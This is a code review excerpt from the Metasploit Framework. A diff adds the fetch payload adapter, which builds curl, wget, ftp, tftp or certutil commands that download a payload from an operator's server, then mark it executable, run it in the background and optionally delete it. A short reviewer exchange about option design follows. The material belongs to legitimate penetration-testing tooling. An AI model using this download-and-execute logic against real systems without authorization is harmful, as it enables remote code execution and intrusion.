lib/msf/core/payload/adapter/fetch.rb

```diff
@@ -0,0 +1,292 @@
+    # TODO: Make a check method that determines if we support a platform/server/command combination
+    #
+    case datastore['FETCH_COMMAND'].upcase
+    when 'FTP'
+      vprint_status("Dispatching to FTP")
+      return _generate_ftp_command
+    when 'TNFTP'
+      vprint_status("Dispatching to TNFTP")
+      return _generate_tnftp_command
+    when 'WGET'
+      vprint_status("Dispatching to WGET")
+      return _generate_wget_command
+    when 'CURL'
+      vprint_status("Dispatching to CURL")
+      return _generate_curl_command
+    when 'TFTP'
+      vprint_status("Dispatching to TFTP")
+      return _generate_tftp_command
+    when 'CERTUTIL'
+      vprint_status("Dispatching to CERTUTIL")
+      return _generate_certutil_command
+    else
+      fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
+    end
+  end
+
+  def generate_stage(opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
+    super
+  end
+
+  def generate_payload_uuid(conf = {})
+    conf[:arch] ||= module_info['AdaptedArch']
+    conf[:platform] ||= module_info['AdaptedPlatform']
+    super
+  end
+
+  def handle_connection(conn, opts = {})
+    opts[:arch] ||= module_info['AdaptedArch']
+    super
+  end
+
+  def srvhost
+    datastore['FETCH_SRVHOST']
+  end
+
+  def srvport
+    datastore['FETCH_SRVPORT']
+  end
+
+  def srvuri
+    return datastore['FETCH_URIPATH'] unless datastore['FETCH_URIPATH'].blank?
+    default_srvuri
+  end
+
+  def srvname
+    datastore['FetchServerName']
+  end
+
+  def windows?
+    return platform.platforms.first == Msf::Module::Platform::Windows
+  end
+
+
+  # copied from https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/socket_server.rb
+  def _determine_server_comm(ip, srv_comm = datastore['ListenerComm'].to_s)
+    comm = nil
+
+    case srv_comm
+    when 'local'
+      comm = ::Rex::Socket::Comm::Local
+    when /\A-?[0-9]+\Z/
+      comm = framework.sessions.get(srv_comm.to_i)
+      raise(RuntimeError, "Socket Server Comm (Session #{srv_comm}) does not exist") unless comm
+      raise(RuntimeError, "Socket Server Comm (Session #{srv_comm}) does not implement Rex::Socket::Comm") unless comm.is_a? ::Rex::Socket::Comm
+    when nil, ''
+      unless ip.nil?
+        comm = Rex::Socket::SwitchBoard.best_comm(ip)
+      end
+    else
+      raise(RuntimeError, "SocketServer Comm '#{srv_comm}' is invalid")
+    end
+
+    comm || ::Rex::Socket::Comm::Local
+  end
+
+  def _execute_add
+    vprint_status('_execute_add')
+    return _execute_win if windows?
+    return _execute_nix
+  end
+
+  def _execute_win
+    vprint_status('_execute_win')
+    cmds = " & start /B #{_remote_destination_win}"
+    cmds << " & del #{_remote_destination_win}" if datastore['FETCH_DELETE']
+    cmds
+  end
+
+  def _execute_nix
+    vprint_status('_execute_nix')
+    cmds = "; chmod +x #{_remote_destination_nix}"
+    cmds << "; #{_remote_destination_nix} &"
```

Comment:
Not a blocker; Does this need to user configurable, similar to the PrependFork option? 🤔 

```
   PrependFork                 false            no        Prepend a stub that starts the payload in its own process via fork
```

Reply:
Do you mean running the payload in the background?  The drumbeat for this has been "no extra options."  I think Spencer and I specifically talked about this and figured we could add the advanced option in if people decided they needed it, and default to this behavior.